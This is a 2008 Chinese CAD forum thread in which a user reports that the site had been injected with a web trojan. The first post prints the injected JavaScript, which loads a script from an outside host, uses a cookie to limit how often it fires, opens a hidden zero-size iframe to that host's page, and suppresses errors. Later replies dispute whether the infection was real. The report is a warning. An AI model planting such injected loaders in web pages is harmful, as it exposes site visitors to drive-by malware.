QQ登录

只需一步,快速开始

登录 | 注册 | 找回密码

三维网

 找回密码
 注册

QQ登录

只需一步,快速开始

展开

通知     

全站
11天前
查看: 2112|回复: 16
收起左侧

此网被挂马

[复制链接]
发表于 2008-11-26 14:38:57 | 显示全部楼层 |阅读模式 来自: 中国浙江金华

马上注册,结识高手,享用更多资源,轻松玩转三维网社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
马:Hack.Exploit.Script.JS.Mixed.c
  1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script>
    8 v9 ?0 ^+ P. I, G$ @
  2. 1 s" D% [  j5 d8 H
  3. document.writeln("<script>";
    7 V% h  [0 _$ N! A- z, ]. @" z) D
  4. document.writeln("function oK_Begin(){";
    ' `! {' V) h' \, E- ]) }- y
  5. document.writeln("var Then = new Date() ";) ~" ^2 a) a* G  i9 G
  6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
    ! P$ V8 M( n1 H4 O) v& P, ?
  7. document.writeln("var cookieString = new String(document.cookie)";
    & E) p: c* S' N: f; _  [- }% h2 k7 L9 ~
  8. document.writeln("var cookieHeader = "Cookie1=" ";
    ; a+ i# ?7 c* e4 y% I% p/ ?
  9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
    2 _# ?' |7 d; @7 }, @
  10. document.writeln("if (beginPosition != -1){ ";
    $ x2 d" Q7 z& N3 K7 A: e
  11. document.writeln("} else ";1 z' C3 }7 L6 F; O4 ]% P
  12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";6 t9 r0 O! e5 F9 s, Q. H
  13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";' q7 Y- v$ j& R, A; W7 y
  14. document.writeln("}";
    : N, T; T$ w0 V' M! O# W4 ]
  15. document.writeln("}";
    9 n. e7 w) T" A
  16. document.writeln("oK_Begin();";. s+ ~, X8 I( o+ i, M" B: ]
  17. document.writeln("<\/script>";
    3 l2 l" S% a9 ^2 J# E
  18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"
    4 N: F$ I% L+ ~

  19. - @( l% @) L4 _" Q: {
  20. ! e" W% y3 _" W6 B6 U

  21. 2 X+ p6 _. Y# j$ P  V6 k% l$ r( x

  22. ! Y, w. M/ o; [" a' U  M

  23. $ B% p5 X* s+ {6 \; ]
复制代码
虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马
发表于 2008-11-26 14:44:03 | 显示全部楼层 来自: 中国浙江宁波
请管理员确认是否网页挂马?
发表于 2008-11-26 14:47:52 | 显示全部楼层 来自: 中国江苏南京
我的麦咖啡都没检测出来 你什么杀毒软件?
 楼主| 发表于 2008-11-26 16:16:23 | 显示全部楼层 来自: 中国浙江金华

回复 3# cayuer 的帖子

不是杀软件查的.4 p8 E* i9 s" [
只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.  P, |/ X" t6 K# r" C6 u
不过,已经被清理了.
' b) L" _; n- f' s1 ?' ?- N7 l$ i6 i' V0 e
HEHE
. f6 r4 @+ A0 D- L* X) z9 _5 f2 \" A5 j$ ]
[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]
发表于 2008-11-26 18:27:17 | 显示全部楼层 来自: 中国浙江温州
你这个什么网站,哪里出来的?* w3 W3 i; f4 D* j! b' [

" |+ s) n3 ?! K0 t! r: W' Eht tp://u.cruze3.cn/u.js
 楼主| 发表于 2008-11-27 09:15:28 | 显示全部楼层 来自: 中国浙江金华

回复 5# 江南有雪 的帖子

http://u.cruze3.cn/u.js
$ o0 {, e: f" n0 v5 n. ]0 q4 x此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.+ x$ N2 B# @3 Q- ~/ }
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.- K0 `/ U1 G* W) U
HEHE
发表于 2008-11-27 10:26:38 | 显示全部楼层 来自: LAN

回复 6# czy12 的帖子

这跟三维有什么关系?
 楼主| 发表于 2008-11-27 11:01:02 | 显示全部楼层 来自: 中国浙江金华
这是挂在三维网论坛里的./ `8 X: T) O9 v5 |4 N, {8 _
红线所指
moma.jpg
发表于 2008-11-27 11:21:19 | 显示全部楼层 来自: 中国上海
奇怪,为什么我的里面没有?是不是楼主的机器自己带病毒了?
发表于 2008-11-27 11:26:10 | 显示全部楼层 来自: 中国甘肃兰州
自己的机子中毒了,就不要满天喊叫了,没人会认为你是一个杀毒的行家
 楼主| 发表于 2008-11-27 11:34:27 | 显示全部楼层 来自: 中国浙江金华
不学无术.% T* \% [( F' L* e9 D# ^
HEHE
mlm.jpg
发表于 2008-11-27 14:30:45 | 显示全部楼层 来自: 中国香港
但在:
  h: B$ d) ~" n& F; @) Xhttp://www.3dportal.cn/discuz/ 之原
/ {" z' h% y% O' h+ V似乎看不见楼主所说的 http://u.cruze3.cn/u.js3 q9 F& m  n0 p7 p1 E! c) D* v

5 W2 p: f4 N8 P/ X. r% M) y[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]
发表于 2008-11-27 15:30:58 | 显示全部楼层 来自: 中国山东泰安
经过自编扫描代码处理结果,未发现楼主说的挂马代码!
( o. \5 b& j; R0 u% K# H. L2 |; W- w! m# A3 P- G- a3 `/ u9 t5 g8 S$ S8 {
请清理自己计算机的缓冲区!
1.JPG
头像被屏蔽
发表于 2008-11-27 15:43:48 | 显示全部楼层 来自: 中国河北衡水
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2008-11-27 15:47:42 | 显示全部楼层 来自: 新加坡

回复 8# czy12 的帖子

看您的尾符/script,很像是U盘病毒。
 楼主| 发表于 2008-11-27 15:50:50 | 显示全部楼层 来自: 中国浙江金华
DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。8 y* W# q0 M9 B0 H
我也说了:已修复。2 ~0 w% Y: p) d! Q) N# g! d3 [3 K
% M: \( M& @3 m0 s; p8 X- Q  J4 o
ps:这与缓存毫无关系。虽然缓存中有U.JS.9 v' t3 C* O2 V0 C' Q$ q( r7 _; a0 ?
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?+ W7 m8 s9 x. z( v/ z. A* j
% o, I# |( R8 J1 @! c  _  j1 x0 M
script是个JAVA代码,与U盘何关?7 \8 p( \# V7 V9 i3 s, D% H

+ F* k7 q4 D: E3 P( r' e% VHEHE5 q9 e8 Q. J  {) {; `- }9 J, z

  _% v* ]! {* e( g[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]
发表于 2008-11-27 16:11:40 | 显示全部楼层 来自: 中国山东泰安
非也,代码是程序直接采样的当时的网页代码,是自编的,算不上权威,但是可以直接进入部分加密网站!
; d7 {; W" L8 Q) _9 y" \
  x: W' m. |/ Y如果却如你说的修改了,我想,这只有论坛管理员有这个权限,即便是后台也是有记录的。假如确实是论坛后台修改了,一定会给大伙一个说法的。, H8 D/ i' b, k6 Q* S5 R: B

9 b9 s% M: ]. K4 K( i- P, m相反,目前从各方面提供的代码显示,确实“此时此刻”是正常的!至于继续讨论已经无大的价值!
发表回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则


Licensed Copyright © 2016-2020 http://www.3dportal.cn/ All Rights Reserved 京 ICP备13008828号

小黑屋|手机版|Archiver|三维网 ( 京ICP备2023026364号-1 )

快速回复 返回顶部 返回列表